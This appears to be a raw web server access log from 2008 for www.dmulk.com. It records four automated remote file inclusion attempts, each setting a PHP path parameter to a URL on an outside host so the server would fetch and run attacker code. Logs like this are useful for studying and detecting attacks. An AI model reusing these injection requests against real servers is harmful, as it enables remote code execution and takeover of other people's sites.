80.241.163.249 - - [29/Nov/2008:10:33:45 -0800] "GET /logs/access_080620.log//skin/zero_vote/error.php?dir=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.110.161 - - [29/Nov/2008:10:33:58 -0800] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.11 - - [29/Nov/2008:10:34:18 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:10:34:18 -0800] "GET /logs/access_071223.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://h1.ripway.com/xdedzx/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
